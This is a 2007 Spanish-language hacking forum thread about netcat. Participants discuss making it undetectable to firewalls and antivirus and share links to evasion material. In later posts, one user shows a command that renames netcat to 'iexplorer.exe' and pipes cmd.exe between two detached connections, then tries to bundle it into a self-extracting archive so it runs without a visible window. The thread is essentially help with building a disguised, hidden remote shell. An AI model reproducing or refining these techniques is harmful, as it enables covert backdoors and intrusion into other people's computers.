Jugando con netcat

ne0x · 3 Abril 2007, 13:23 PM

Estaria wapo conseguir que no lo detectase...

NewLog · 3 Abril 2007, 23:52 PM

Para el firewall es hacer lo que ya se ha explicado. Una shell pipelada (como dicen xD).

Ahora me miro eso del método RIT!

De momento he encontrado algo útil! No se queda en modificar el código, el muy bestia te modifica el binario! Ole sus huevos!

http://packetstorm.linuxsecurity.com/papers/virus/Taking_Back_Netcat.pdf

gblaze · 4 Abril 2007, 22:09 PM

Tengo un problema con esto " JUGANDO CON NETCAT V1.1
Parte II"

este comando no me sale bien mira:

==================================

type mensaje.txt|nc -vv -w 3 127.0.0.1 25

==================================

dice que "nc" no es un comando reconocido, aqui esta la imagen:

alguien me puede ayudar?? gracias!

ne0x · 4 Abril 2007, 22:55 PM

Si, yo me bajaria el Netcat y lo copiaria en una carpeta que este en el PATH.

Que es el PATH ?
Pues basicamente una variable que contiene las rutas en la que buscar archivos ejecutables, comandos, etc.. separadas por " ; ".

Mi PATH: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\MinGW\bin

Mi recomendacion es que lo copies en %SystemDrive%\Windows\System32

Lo puedes bajar desde la pagina de http://www.elhacker.net, en la sección Hacking.

Te pongo ya el enlace: http://safariexamples.informit.com/0201719568/Misc/Netcat/NT/nc11nt.zip

Saludos !!

NewLog · 5 Abril 2007, 02:06 AM

No teniamos que irnos tan lejos para encontrar como hacer netcat indetectable:

http://foro.elhacker.net/index.php/topic,38580.0.html

o número 28 de la revista hackxcrack.

ChizzoColman · 5 Abril 2007, 22:50 PM

Hola que tal...saliendome del tema WHK me das tu e-mail a si me ayudas..Tengo varias preguntas

ne0x · 5 Abril 2007, 23:44 PM

Ponlas aqui y te ayudaremos todos.

dasdas · 11 Abril 2007, 18:31 PM

buenas señoras, haciendo uso del metodo de ne0x estoy intentando crear el ejecutable con el winzip pero ... solo me ejecuta el primer comando, a ver si me explico, al poner:

Citariexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25

en "ejecutar despues de extraer", solo me ejecuta el:

Citariexplorer -d 127.0.0.1 21

entonces.... creo recordar que en linux lo que hacia era crear un archivo adjunto donde poner los argumentos que en este caso seria:

Citar-d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25

e invocarlo asi:

Citariexplorer.exe < archivoadjunto

pero no se si es fallo mio o que en la shell de win no se hace asi. alguna idea?

hepy_92 · 11 Abril 2007, 22:51 PM

GrAcIaS!!!!!
weniiiisimo el manual, algo que he buscado desde hace tiempo
muy bien explicado y muy completo!!!
aver si te animas a hacer uno para poder transferir archivos

dasdas · 11 Abril 2007, 23:09 PM

ah! me olvidado decir que haciendo un .bat no me soluciona, ya que entonces si que funciona el invento pero se abre una ventana de shell con todo el comando.... y como que queda un poco feo =P